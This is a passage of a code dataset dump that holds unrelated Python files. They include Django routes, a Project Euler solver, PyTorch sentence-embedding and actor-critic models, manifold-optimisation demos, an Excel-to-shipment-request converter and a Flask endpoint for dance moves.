path('getPaperListByAid',views.getPaperListByAid),\n path('complexSearch',views.complexSearch),\n path('follow_author/', views.followAuthor),\n path('show_followed/', views.followed),\n path('cancel_follow/', views.cancel_follow),\n path('collect_paper/', views.collect_paper),\n path('verify_author/', views.veri_author),\n path('verify_success/', views.verify_success),\n path('check_user_info/', views.check_user_info),\n path('edit_user_info/', views.edit_user_info),\n 
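# ranking, recommendation and miscellaneous lookup routes\n    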
path('hot_author/', views.hot_author),\n path('hot_paper/', views.hot_paper),\n path('hot_field/', views.hot_field),\n path('show_collected/', views.collected),\n path('cancel_collect/', views.cancel_collect),\n path('getAuthorInfoById',views.getAuthorInfoById),\n path('getPaperOfField',views.getPaperOfField),\n path('getAuthorOfField', views.getAuthorOfField),\n path('Authentication',views.Authentication),\n path('getBrowerHistory',views.getBrowerHistory),\n path('check_user', views.check_user),\n path('hot_orgz/',views.hot_orgz),\n path('hot_studyz/',views.hot_studyz),\n path('hot_authorz/',views.hot_authorz),\n path('hot_paperz/',views.hot_paperz),\n path('paper_recommend',views.paper_recommend),\n path('deleteAllBrowerHistory',views.deleteAllBrowerHistory),\n path('related_paper',views.related_paper),\n path('refer_string/',views.refer_string),\n path('guozong/',views.guozong),\n path('topic_orgs/',views.topic_orgs)\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","sub_path":"app01/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"428859156","text":"# -*- coding: utf-8 -*-\n\n\ndef es_solucion(a, b, p):\n\n pcalc = a + b + (a**2 + b**2)**0.5\n\n if (pcalc == p):\n return True\n\n return False\n\n\ndef result():\n maxp = 0\n total = 0\n max_total = 0\n\n N = 1000\n\n # for p in range(1, N-(N//2)):\n for p in range(1, N):\n\n total = 0\n\n for a in range(1, 1001):\n\n for b in range(a+1, 1001):\n\n if a + b > p:\n break\n\n if es_solucion(a, b, p):\n # print(a, b, p)\n total = total + 1\n\n if (max_total < total):\n maxp = p\n max_total = total\n # print(\"total\", maxp, max_total, p, a, b)\n return maxp\n","sub_path":"projecteuler/problems/d0025/p0039/r0039.py","file_name":"r0039.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"605250612","text":"#1.生成器可以产出值,也可以接收值(调用方传进来的值)\ndef gen_func():\n html = yield \"http://projectsedu.com\"\n print(html)\n yield 2\n yield 3\n return \"bobby\"\n\nif __name__ == \"__main__\":\n gen = gen_func()\n #启动生成器的方式有两种:next(),send()\n url = next(gen)\n # 在调用send发送非None值之前,我们必须启动一次生成器,两种方式1.gen.send(None) 2.next(gen)\n # url = gen.send(None)\n # download url\n html = \"bobby\"\n #send方法可以传递值到生成器内部,同时还可以重启生成器执行到下一个yield位置\n gen.send(html)\n # print(gen.send(html))","sub_path":"sample/chapter12/03_coroutine_test.py","file_name":"03_coroutine_test.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"336154691","text":"import torch\nfrom torch import nn\nfrom torch.autograd import Variable\n\nfrom datetime import datetime, timedelta\n\nfrom .Sent2Vec.skip_thoughts.data_loader import DataLoader\nfrom .Sent2Vec.skip_thoughts.model import UniSkip\nfrom .Sent2Vec.skip_thoughts.config import *\n\nclass Skip_Thoughts:\n def __init__(self, batch_size=64, epochs=1000, input_data='../Data/data.txt',\n saved_model_loc='../../Saved_model/sent2vec_model'):\n self.batch_size = batch_size\n self.epochs = epochs\n self.saved_model_loc = saved_model_loc\n self.d = DataLoader(input_data)\n self.model = UniSkip()\n if USE_CUDA:\n self.model.cuda(CUDA_DEVICE)\n\n self.optimizer = torch.optim.Adam(params=self.model.parameters(), lr=LEARNING_RATE)\n\n self.loss_trail = []\n self.last_best_loss = None\n self.current_time = 
datetime.utcnow()\n\n def debug(self, i, loss, prev, nex, prev_pred, next_pred):\n\n this_loss = loss.item()\n self.loss_trail.append(this_loss)\n self.loss_trail = self.loss_trail[-20:]\n new_current_time = datetime.utcnow()\n time_elapsed = str(new_current_time - self.current_time)\n self.current_time = new_current_time\n print(\"Iteration {}: time = {} last_best_loss = {}, this_loss = {}\".format(i, time_elapsed, self.last_best_loss,\n this_loss))\n\n print(\"prev = {}\\nnext = {}\\npred_prev = {}\\npred_next = {}\".format(\n self.d.convert_indices_to_sentences(prev),\n self.d.convert_indices_to_sentences(nex),\n self.d.convert_indices_to_sentences(prev_pred),\n self.d.convert_indices_to_sentences(next_pred),\n ))\n\n try:\n trail_loss = sum(self.loss_trail) / len(self.loss_trail)\n if self.last_best_loss is None or self.last_best_loss > trail_loss:\n print(\"Loss improved from {} to {}\".format(self.last_best_loss, trail_loss))\n\n print(\"saving model at {}\".format(self.saved_model_loc))\n torch.save(self.model.state_dict(), self.saved_model_loc)\n\n self.last_best_loss = trail_loss\n except Exception as e:\n print(\"Couldn't save model because {}\".format(e))\n\n def train(self):\n\n print(\"Starting to train Skip_thoughts...\")\n for i in range(self.epochs):\n sentences, lengths = self.d.fetch_batch(self.batch_size)\n\n loss, prev, nex, prev_pred, next_pred = self.model(sentences, lengths)\n\n if i % 10 == 0:\n self.debug(i, loss, prev, nex, prev_pred, next_pred)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n\nclass Sent2Vec_Networks:\n def __init__(self, batch_size=64, epochs=1000, input_data='../Data/data.txt',\n saved_model_loc='../../Saved_model/sent2vec_model', algorithm='skip_thoughts'):\n self.model = None\n if algorithm == 'skip_thoughts':\n self.model = Skip_Thoughts(batch_size, epochs, input_data, saved_model_loc)\n\n def train(self):\n if self.model is not None:\n self.model.train()\n","sub_path":"Nlp_Model/Model/Sent2Vec_Networks.py","file_name":"Sent2Vec_Networks.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"509991823","text":"article_text_folders = \"./train-articles\"\narticle_maps = \"./data/train-task2-TC.labels\"\nimport io\nimport glob\nimport os\nimport pandas as pd\nf_in = io.open(article_maps, mode=\"r\", encoding=\"utf-8\")\nkey = \"article{}.txt\"\ndata={}\ncounter = 0\nfl_id_lst = []\nstart_range_lst = []\nend_rage_lst = []\ntext_ = []\nTC_ = []\nfor ln in f_in:\n '''\n for each line map the actual text file \n '''\n fl_id = 0\n start_range = 0\n end_rage = 0\n tab_seperated = ln.split('\\t')\n print(tab_seperated)\n fl_id = tab_seperated[0].strip()\n tc_text = tab_seperated[1].strip()\n start_range = int(tab_seperated[2].strip())\n end_rage = int(tab_seperated[3].strip().replace('\\n',''))\n tmp = key.format(fl_id)\n tmp_fl = os.path.join(article_text_folders,tmp)\n artice_text = io.open(tmp_fl, mode=\"r\", encoding=\"utf-8\")\n data = artice_text.read()\n propaganda_ = data[start_range:end_rage]\n artice_text.close()\n fl_id_lst.append(fl_id)\n TC_.append(tc_text)\n start_range_lst.append(start_range)\n end_rage_lst.append(end_rage)\n text_.append(propaganda_)\nf_in.close()\nframe_ = pd.DataFrame({'File_ID': fl_id_lst, 'Classification':TC_,'Start_IDX':start_range_lst, 'End_IDX':end_rage_lst, 'Associated_Propaganda':text_})\nwriter = pd.ExcelWriter('mapping_TC.xlsx', engine='xlsxwriter')\nframe_.to_excel(writer, 
sheet_name='task-2')\nwriter.save()\n","sub_path":"Word_Maps_TC.py","file_name":"Word_Maps_TC.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"506540733","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport geoopt\n\n\ndef demo_manifold_tensor(shape=(3, 2)):\n \"\"\"\n f(W) = sum(W @ a)\n Demonstrate manifold.projx(.) (manifold_tensor.proj_()), manifold.proju(.), manifold.retr(.).\n \"\"\"\n W_init = geoopt.ManifoldTensor(torch.randn(shape), manifold=geoopt.Sphere()) # oblique\n manifold = W_init.manifold\n W = geoopt.ManifoldTensor(W_init.proj_(), manifold=geoopt.Sphere(), requires_grad=True)\n a = torch.randn(2)\n b = (W @ a).sum()\n b.backward()\n print(f\"W: {W}\\nnorm: {W.norm(dim=1)}\")\n\n with torch.no_grad():\n stepsize = 0.1\n rgrad = manifold.egrad2rgrad(W, W.grad)\n W_next = manifold.retr(W, stepsize * rgrad)\n print(f\"W_next: {W_next}\\nnorm: {W_next.norm(dim=1)}\")\n\n diag_ele = torch.diag(W @ rgrad.T)\n assert np.allclose(diag_ele.numpy(), 0, atol=1e-6), f\"rgrad is not orthogonal to W: {diag_ele}\"\n\n\nclass LastLayer(nn.Module):\n def __init__(self, M, K):\n super().__init__()\n W_init = geoopt.ManifoldTensor(torch.randn((K, M)), manifold=geoopt.Sphere())\n manifold = W_init.manifold\n self.W = geoopt.ManifoldParameter(manifold.projx(W_init), manifold=geoopt.Sphere()) # (K, M), row-wise\n self.b = geoopt.ManifoldParameter(torch.ones((K,)))\n\n def forward(self, x):\n # x: (B, M), W: (K, M)\n return x @ self.W.T + self.b\n\n\ndef demo_manifold_param(M=2, K=4):\n \"\"\"\n Demonstrates initializing a ManifoldParameter, RiemannianSGD (optimizer).\n\n Parameters\n ----------\n M: int\n Feature dimension.\n K: int\n Number of classes.\n \"\"\"\n M, K = 2, 4\n model = LastLayer(M, K)\n with torch.no_grad():\n print(f\"{model.W}\\n{model.W.norm(dim=1)}\") # should all be unit-norm, row-wise\n\n opt = geoopt.optim.RiemannianSGD([param for param in model.parameters() if param.requires_grad], lr=0.01,\n momentum=0.95, nesterov=True)\n\n B = 3\n X = torch.randn((B, M)) # (B, M), W: (K, M)\n X_out = model(X)\n y_out = X_out.sum() # L = sum(x @ W.T + b)\n opt.zero_grad()\n y_out.backward()\n opt.step()\n\n with torch.no_grad():\n print(f\"{model.W}, {model.W.norm(dim=1)}\") # should be different from init but still unit-norm\n","sub_path":"run_cifar100/demos.py","file_name":"demos.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"149032400","text":"import numpy as np\nimport scipy.signal\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions.normal import Normal\n\ndef _weight_init(module):\n if isinstance(module, nn.Linear):\n torch.nn.init.xavier_normal_(module.weight, gain=0.01)\n module.bias.data.zero_()\n\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\ndef mlp(sizes, activation, output_activation=nn.Identity()):\n layers = []\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n layers += [nn.Linear(sizes[j], sizes[j+1]), act]\n return nn.Sequential(*layers)\n\ndef count_vars(module):\n return sum([np.prod(p.shape) for p in module.parameters()])\n\nclass GenerativeGaussianMLPActor(nn.Module):\n\n def 
__init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n self.epsilon_dim = act_dim * act_dim\n hidden_sizes[0] += self.epsilon_dim\n self.net = mlp([obs_dim+self.epsilon_dim] + list(hidden_sizes) + [act_dim], activation, nn.Tanh())\n self.apply(_weight_init)\n\n def forward(self, obs, std=1.0, noise='gaussian', epsilon_limit=5.0):\n if noise == 'gaussian':\n epsilon = (std * torch.randn(obs.shape[0], self.epsilon_dim, device=obs.device)).clamp(-epsilon_limit, epsilon_limit)\n else:\n epsilon = torch.rand(obs.shape[0], self.epsilon_dim, device=obs.device) * 2 - 1\n pi_action = self.net(torch.cat([obs, epsilon], dim=-1))\n return pi_action\n\nclass MLPQFunction(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n hidden_sizes[0] += act_dim\n self.q = mlp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation)\n self.apply(_weight_init)\n\n def forward(self, obs, act):\n q = self.q(torch.cat([obs, act], dim=-1))\n return torch.squeeze(q, -1) # Critical to ensure q has right shape.\n\nclass MLPActorCritic(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=(256,256),\n activation=nn.LeakyReLU(negative_slope=0.2)):\n super().__init__()\n\n obs_dim = observation_space.shape[0]\n act_dim = action_space.shape[0]\n\n # build policy and value functions\n self.pi = GenerativeGaussianMLPActor(obs_dim, act_dim, hidden_sizes, activation)\n self.q1 = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation)\n self.q2 = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation)\n\n self.obs_mean = torch.FloatTensor([0.0])\n self.obs_std = torch.FloatTensor([0.0])\n\n def act(self, obs, deterministic=False, noise='gaussian', obs_limit=5.0):\n obs = ((obs - self.obs_mean.to(obs.device))/(self.obs_std.to(obs.device) + 1e-8)).clamp(-obs_limit, obs_limit)\n with torch.no_grad():\n if deterministic:\n a = self.pi(obs, std=0.5, noise=noise)\n else:\n a = self.pi(obs, noise=noise)\n return a.detach().cpu().numpy()[0]\n\n# Maximum Mean Discrepancy\n# geomloss: https://github.com/jeanfeydy/geomloss\n\nclass Sqrt0(torch.autograd.Function):\n\n @staticmethod\n def forward(ctx, input):\n result = input.sqrt()\n result[input < 0] = 0\n ctx.save_for_backward(result)\n return result\n\n @staticmethod\n def backward(ctx, grad_output):\n result, = ctx.saved_tensors\n grad_input = grad_output / (2*result)\n grad_input[result == 0] = 0\n return grad_input\n\ndef sqrt_0(x):\n return Sqrt0.apply(x)\n\ndef squared_distances(x, y):\n if x.dim() == 2:\n D_xx = (x*x).sum(-1).unsqueeze(1) # (N,1)\n D_xy = torch.matmul( x, y.permute(1,0) ) # (N,D) @ (D,M) = (N,M)\n D_yy = (y*y).sum(-1).unsqueeze(0) # (1,M)\n elif x.dim() == 3: # Batch computation\n D_xx = (x*x).sum(-1).unsqueeze(2) # (B,N,1)\n D_xy = torch.matmul( x, y.permute(0,2,1) ) # (B,N,D) @ (B,D,M) = (B,N,M)\n D_yy = (y*y).sum(-1).unsqueeze(1) # (B,1,M)\n else:\n print(\"x.shape : \", x.shape)\n raise ValueError(\"Incorrect number of dimensions\")\n\n return D_xx - 2*D_xy + D_yy\n\ndef gaussian_kernel(x, y, blur=1.0):\n C2 = squared_distances(x / blur, y / blur)\n return (- .5 * C2 ).exp()\n\ndef energy_kernel(x, y, blur=None):\n return -squared_distances(x, y)\n\nkernel_routines = {\n \"gaussian\" : gaussian_kernel,\n \"energy\" : energy_kernel,\n}\n\ndef mmd(x, y, kernel='gaussian'):\n b = x.shape[0]\n m = x.shape[1]\n n = y.shape[1]\n\n if kernel in kernel_routines:\n kernel = kernel_routines[kernel]\n\n K_xx = kernel(x, x).mean()\n K_xy = kernel(x, y).mean()\n K_yy = 
kernel(y, y).mean()\n\n return sqrt_0(K_xx + K_yy - 2*K_xy)\n\nif __name__ == '__main__':\n max_z = 0\n avg_z = 0\n min_z = 100\n batch = 1000\n for _ in range(1000):\n # x = torch.randn(batch, 2)\n x = torch.rand(batch, 2) * 2 - 1\n y = torch.rand(batch, 2) * 2 - 1\n z = mmd(x, y, kernel='gaussian')\n avg_z += z\n max_z = max(max_z, z)\n min_z = min(min_z, z)\n print(max_z)\n print(min_z)\n print(avg_z/1000.0)","sub_path":"gac/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"101244669","text":"import csv\nimport copy\nimport json\nimport os\nimport shutil\nimport openpyxl as exl\nimport easygui\nimport time \nimport random\nimport sys\n#import colorama\nfrom pathlib import Path\nfrom tabulate import tabulate\nfrom utils import build_text_menu\n#from colorama import Fore, Style\n\nclass Excel_Handler:\n def __init__(self,instance_num):\n if instance_num==0:\n self.conf=self.__init_conf(0)\n if self.conf is None:\n print('problem initializing')\n exit()\n self.requests=[]\n else:\n self.conf=self.__init_conf(instance_num)\n self.requests=self.load_instance()\n\n def __init_folder(self,rand):\n script_dir = Path(os.path.dirname(__file__)) \n folder_name = 'outfiles/'+str(rand)+'/'\n working_folder = os.path.dirname(folder_name)\n try:\n os.makedirs(os.path.join(script_dir,working_folder), exist_ok=False)\n except FileExistsError as e:\n try:\n shutil.rmtree(working_folder)\n os.makedirs(working_folder, exist_ok=False)\n except Exception as e:\n print(\"error initializing:\"+str(e))\n return None\n return os.path.join(script_dir,working_folder)\n\n def __init_conf(self,instance_num):\n rand = 0\n if instance_num==0: \n rand= random.randint(1, 1000000)\n print(\"instance \"+str(rand))\n working_folder=self.__init_folder(rand) \n else:\n working_folder= os.path.dirname('outfiles/'+str(instance_num)+'/')\n print(\"loading instance \"+str(instance_num))\n self.instance=rand\n resource_path=os.path.join(Path(os.path.dirname(__file__)),'resources') \n\n try: \n with open(os.path.join(resource_path,'country-codes.txt')) as csvfile:\n reader = csv.reader(csvfile, delimiter='\\t')\n country_map = {rows[0].upper(): rows[1].upper() for rows in reader}\n except Exception as e:\n print(\"missing country file country-codes.txt\",e)\n # print(e)\n return None\n try:\n with open(os.path.join(resource_path,'delivery-request-schema.json')) as json_file:\n schema= json.load(json_file)\n except:\n print(\"missing schema file delivery-request-schema.json\")\n return None\n try:\n with open(os.path.join(resource_path,'shipment-request-schema.json')) as json_file:\n shipment_schema= json.load(json_file)\n except:\n print(\"missing schema file shipment-request-schema.json\")\n return None\n fields_map = {'OrderNumber':0,\n 'FirstName':1,\n 'LastName':2,\n 'CompanyName':3, \n 'AddressLine1':4,\n 'AddressLine2':5,\n 'AddressLine3City':6,\n 'AddressLine4State':7,\n 'Postcode':8, \n 'CountryCode':9,\n 'EndContactEmail':10,\n 'EndContactPhone':11,\n 'ShipmentItemsArray.ProductHarmonizedCode':12,\n 'ShipmentItemsArray.ProductDescription':13,\n 'ShipmentItemsArray.ProductUnitWeight':14, \n 'ShipmentItemsArray.ProductUnitValue':15,\n 'ShipmentItemsArray.ProductQuantity':16,\n 'ShipmentItemsArray.ProductItemOrigin':17,\n 'Currency':18,\n 'ParcelWeight':19,\n 'Length':21,\n 'Width':22,\n 'Height':23,\n 'Fourlogref':24,\n 'ShippingTerms':25,\n 'InvoiceNumber':26,\n 'Vat':27,\n 'PurchasedBy':28,\n 
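# last two columns ('Uom'/'UomDim') presumably map unit-of-measure fields\n                      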
'Uom':29,\n 'UomDim':30}\n if instance_num==0:\n worksheet, original= self.load_excel()\n else:\n worksheet=None\n return [country_map,schema,shipment_schema,fields_map,working_folder,worksheet,original]\n\n def fix_request(self,schema,request):\n root_key=list(request.keys())[0]\n request[root_key]['s']['ParcelWeight']=request[root_key]['s']['ShipmentItemsArray'][0]['ProductUnitWeight']\n\n if request[root_key]['s']['LastName'] is None or request[root_key]['s']['LastName']==\"\":\n first_name=request[root_key]['s']['FirstName'].strip()\n if len(first_name.split(' '))>1:\n request[root_key]['s']['LastName']=request[root_key]['s']['FirstName'].split(' ')[-1]\n request[root_key]['s']['FirstName']=' '.join(first_name.split(' ')[:-1])\n\n if request[root_key]['s']['CountryCode']=='US':\n request[root_key]['s']['ShipType']=1\n else:\n request[root_key]['s']['ShipType']=2\n\n for value in request[root_key]['s'].items():\n #print(\"Value\",value,\"Type\",type(value))\n if isinstance(value,tuple):\n if value[0]==\"AddressLine1\" or value[0]==\"AddressLine2\" or value[0]==\"AddressLine3City\" or value[0]==\"EndContactEmail\" or value[0]==\"FirstName\":\n try:\n ''.join(value[1]).encode('ascii')\n except:\n #print(f\"{Fore.YELLOW}\",\"warning - non ASCII characters for order \",request[root_key]['s']['OrderNumber'],\"value:\",value,f\"{Style.RESET_ALL}\")\n print(\"warning - non ASCII characters for order \",request[root_key]['s']['OrderNumber'],\"value:\",value)\n else:\n if ''.join(value[1]).find('\\\\u')>0:\n #print(f\"{Fore.YELLOW}\",\"warning - characters \\\\u for order \",request[root_key]['s']['OrderNumber'],\"value:\",value,f\"{Style.RESET_ALL}\")\n print(\"warning - characters \\\\u for order \",request[root_key]['s']['OrderNumber'],\"value:\",value)\n\n def line_to_json(self,schema,line,country_map,fields_map,vendor,env,user):\n root_key=list(schema.keys())[0]\n delivery_request=copy.deepcopy(schema)\n delivery_request[root_key][\"userName\"]=user.username\n delivery_request[root_key][\"password\"]=user.password\n for schema_key,data_location in fields_map.items():\n input_val=line[data_location].value\n \n if isinstance(input_val, str):\n input_val=line[data_location].value\n input_val=input_val.strip()\n \n if '.' 
not in schema_key:\n #Verify that the field is mandatory and contain a value.\n if schema_key == 'EndContactPhone' and input_val is None:\n print(\"The field Phone is mandatory for order \",delivery_request[root_key]['s']['OrderNumber'],\"Column:\",schema_key,\"Value:\",str(input_val))\n return None\n\n if schema[root_key]['s'][schema_key]==-1:\n if input_val is None:\n delivery_request[root_key]['s'][schema_key]=0\n else:\n if isinstance(input_val, str):\n tmp=\"\"\n for s in input_val:\n if s.isdigit() or s=='.': \n tmp=tmp+s\n try:\n numeric_value=float(tmp)\n except:\n #print(\"Position\",self.Position(fields_map, schema_key))\n print(\"Please add a correct value for order \",delivery_request[root_key]['s']['OrderNumber'],\"Column:\",schema_key,\"Value:\",tmp)\n return None\n else:\n numeric_value=input_val\n delivery_request[root_key]['s'][schema_key]=numeric_value\n else:\n if schema_key == 'CountryCode':\n country_name = str(input_val).upper()\n if country_name is not None and country_name in country_map.keys():\n country_code = country_map[country_name]\n delivery_request[root_key]['s']['CountryCode']=country_code\n elif country_name is not None and country_name in country_map.values():\n country_code = country_name\n delivery_request[root_key]['s']['CountryCode']=country_code\n else:\n print(\"No match for country:\",str(country_name),\" for order \",delivery_request[root_key]['s']['OrderNumber'],\"Column:\",schema_key,\"Value:\",country_name)\n return None\n\n #The Country US have to include the State.\n if country_name == 'UNITED STATES' or country_name == 'US':\n state_name = delivery_request[root_key]['s']['AddressLine4State']\n if state_name is None or state_name.__len__()==0:\n print(\"The state is mandatory for the country United States\",\" for order \",delivery_request[root_key]['s']['OrderNumber'],\"Column:\",schema_key,\"Value: None\")\n return None\n else:\n if state_name.__len__() > 2:\n delivery_request[root_key]['s']['AddressLine4State']=self.ConvertState(state_name)\n\n else:\n if input_val is None:\n delivery_request[root_key]['s'][schema_key]=\"\"\n else:\n delivery_request[root_key]['s'][schema_key]=str(input_val)\n else:\n node_key=schema_key.split('.')[1]\n if schema[root_key]['s']['ShipmentItemsArray'][0][node_key]==-1:\n if input_val is None:\n delivery_request[root_key]['s']['ShipmentItemsArray'][0][node_key]=0\n else:\n if isinstance(input_val, str):\n tmp=\"\"\n for s in input_val:\n if s.isdigit() or s=='.': \n tmp=tmp+s\n numeric_value=float(tmp)\n else:\n numeric_value=input_val\n delivery_request[root_key]['s']['ShipmentItemsArray'][0][node_key]=numeric_value\n else:\n if input_val is None:\n delivery_request[root_key]['s'][schema_key]=\"\"\n else:\n delivery_request[root_key]['s']['ShipmentItemsArray'][0][node_key]=str(input_val)\n return delivery_request\n\n def ConvertState(self, state):\n states = {\"Alabama\":\"AL\",\n \"Alaska\":\"AK\",\n \"Arizona\":\"AZ\",\n \"Arkansas\":\"AR\",\n \"California\":\"CA\",\n \"Colorado\":\"CO\",\n \"Connecticut\":\"CT\",\n \"Delaware\":\"DE\",\n \"Florida\":\"FL\",\n \"Georgia\":\"GA\",\n \"Hawaii\":\"HI\",\n \"Idaho\":\"ID\",\n \"Illinois\":\"IL\",\n \"Indiana\":\"IN\",\n \"Iowa\":\"IA\",\n \"Kansas\":\"KS\",\n \"Kentucky\":\"KY\",\n \"Louisiana\":\"LA\",\n \"Maine\":\"ME\",\n \"Maryland\":\"MD\",\n \"Massachusetts\":\"MA\",\n \"Michigan\":\"MI\",\n \"Minnesota\":\"MN\",\n \"Mississippi\":\"MS\",\n \"Missouri\":\"MO\",\n \"Montana\":\"MT\",\n \"Nebraska\":\"NE\",\n \"Nevada\":\"NV\",\n \"New 
Hampshire\":\"NH\",\n \"New Jersey\":\"NJ\",\n \"New Mexico\":\"NM\",\n \"New York\":\"NY\",\n \"North Carolina\":\"NC\",\n \"North Dakota\":\"ND\",\n \"Ohio\":\"OH\",\n \"Oklahoma\":\"OK\",\n \"Oregon\":\"OR\",\n \"Pennsylvania\":\"PA\",\n \"Rhode Island\":\"RI\",\n \"South Carolina\":\"SC\",\n \"South Dakota\":\"SD\",\n \"Tennessee\":\"TN\",\n \"Texas\":\"TX\",\n \"Utah\":\"UT\",\n \"Vermont\":\"VT\",\n \"Virginia\":\"VA\",\n \"Washington\":\"WA\",\n \"West Virginia\":\"WV\",\n \"Wisconsin\":\"WI\",\n \"Wyoming\":\"WY\",\n \"District of Columbia\":\"DC\"}\n stateConverted=state\n search=states.get(state)\n if (search is not None):\n if (search.__len__() >0):\n stateConverted=search\n return stateConverted\n\n def load_excel(self):\n orders_file_name = easygui.fileopenbox(msg=\"select orders file to upload\",)\n if orders_file_name is None:\n return None\n extension = os.path.splitext(orders_file_name)[1]\n try:\n if extension == '.csv':\n ordersfilename = os.path.join(os.path.splitext(orders_file_name)[0]+'.xlsx')\n wbk = exl.Workbook()\n sh = wbk.active\n with open(orders_file_name, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n row[8]=row[8].replace('\\\"','').replace('=','')\n sh.append(row)\n wbk.save(ordersfilename)\n wb = exl.load_workbook(filename=ordersfilename, data_only=True)\n orders_file_name = ordersfilename\n #os.remove(ordersfilename)\n else:\n wb = exl.load_workbook(filename=orders_file_name, data_only=True)\n active_sheet = wb[wb.sheetnames[0]]\n except Exception as e:\n print(\"Problem reading excel file:\"+str(e))\n return None\n return active_sheet, orders_file_name\n\n def convert_lines(self):\n if len(self.requests)>0:\n return self.requests\n converted=[]\n for e in self.conf:\n if e is None:\n print(\"no conf\")\n return None\n conf=self.conf\n out_folder=conf[4]\n delivery_schema=conf[1]\n shipment_schema=conf[2]\n country_map=conf[0]\n fields_map=conf[3]\n active_sheet = conf[5]\n vendor=input(\"vendor:[JWG]\")\n if vendor==\"\":\n vendor=\"JWG\"\n env=input(\"environment:[p]\") \n if env==\"\":\n env=\"p\"\n max_column = 31\n line_number = 2\n #verify profile of the user\n prof = profile()\n user = prof.manageprofile(env, None, vendor)\n if user is None or user.username==\"\":\n return None\n print(\"converting\")\n for row in active_sheet.iter_rows(2, active_sheet.max_row, 1, max_column):\n if row[0].value is None:\n continue\n #if 4log refernce exist\n print(\"4LogReference:\",str(row[24].value),\"OrderNumber:\",str(row[0].value))\n if row[24].value is not None:\n active_schema=shipment_schema\n else:\n active_schema=delivery_schema\n so_number=row[0].value\n converted_request=self.line_to_json(active_schema,row,country_map,fields_map,vendor,env,user)\n if converted_request is not None:\n self.fix_request(active_schema,converted_request)\n with open(os.path.join(out_folder,str(so_number)+'_request.json'),\"w\",) as request_file:\n request_file.write(json.dumps(converted_request,indent=2))\n converted.append(converted_request)\n else:\n print(\"skipping line number \"+str(line_number))\n line_number=line_number+1\n self.requests=converted\n return(converted)\n\n def load_instance(self):\n folder=self.conf[4]\n requests=[]\n try:\n for file in enumerate(os.listdir(folder)):\n if file.endswith(\"_request.json\"):\n requests.append(json.loads(open(os.path.join(folder,file)).read()))\n except:\n pass\n if len(requests)==0:\n print(\"nothing found\")\n self.requests=requests\n return requests\n\nclass profile:\n pass\n\n #manage the profile of the user. 
parameters: environment, schema and client name\n def manageprofile(self,env,schema_type,client):\n resource_path=os.path.join(Path(os.path.dirname(__file__)),'resources')\n\n #if environment is empty, the default environment is production\n if env==\"\":\n env=\"p\"\n #set the schema type: 1 - Delivery, 2 - SO\n schema=\"Delivery\"\n try: \n _username=\"\"\n _password=\"\"\n _vendor=\"\"\t\t\t \n #look in the profile if the user match the condition to convert Excel\n with open(os.path.join(resource_path,'profile.txt')) as csvfile:\n reader = csv.reader(csvfile, delimiter='\\t')\n for rows in reader:\n if rows[0]==env:\n if rows[1]==schema:\n if rows[2]==client:\n _username=rows[3]\n _password=rows[4]\n if rows[3]==client:\n _vendor=rows[5]\n #if no match, send a message to the user in the screen\n if _username==\"\" and _vendor is None:\n print(\"No valid configuration for this user, schema and environment\")\n return None\n #profile matched\n result = profile()\n result.username = _username\n result.password = _password\n result.vendor = _vendor\n return result\n\n except Exception as e:\n print(\"missing profile file profile.txt\",e) \n return None","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":18166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"491416359","text":"from flask import request\nfrom flask.views import MethodView\nfrom controllers.move import MoveController\n\nimport json\n\nclass MoveView(MethodView):\n\n @classmethod\n def make_move(cls):\n data = json.loads(request.data.decode('utf-8'))\n req_params = ['routine_id', 'name', 'start_time', 'end_time', 'total_time', 'order', 'video_url']\n for param in req_params:\n if param not in data:\n return json.dumps({\"response\": \"ill-formed request\"}), 400\n\n if not (isinstance(data['routine_id'], int) and isinstance(data['name'], str) and isinstance(data['start_time'], str) and isinstance(data['end_time'], str) and isinstance(data['total_time'], str) and isinstance(data['order'], int) and isinstance(data['video_url'], str)):\n return json.dumps({\"response\": \"ill-formed request\"}), 400\n \n error_message, status, response = MoveController.make_move(data['routine_id'], data['name'], data['start_time'], data['end_time'], data['total_time'], data['order'], data['video_url'])\n if error_message:\n return json.dumps({\"response\": error_message}), status\n\n return json.dumps({\"response\": \"success!\"}), 201\n\n##Bug Here\n @classmethod\n def get_moves(cls, routine_id):\n error_message, status, response = MoveController.get_moves(routine_id)\n if error_message:\n return json.dumps({\"response\": error_message}), status\n return json.dumps({\"response\": list(map(lambda x: x.json() if x else None, response))}), status #reponse\n\n\n\n\nif __name__ == \"__main__\":\n 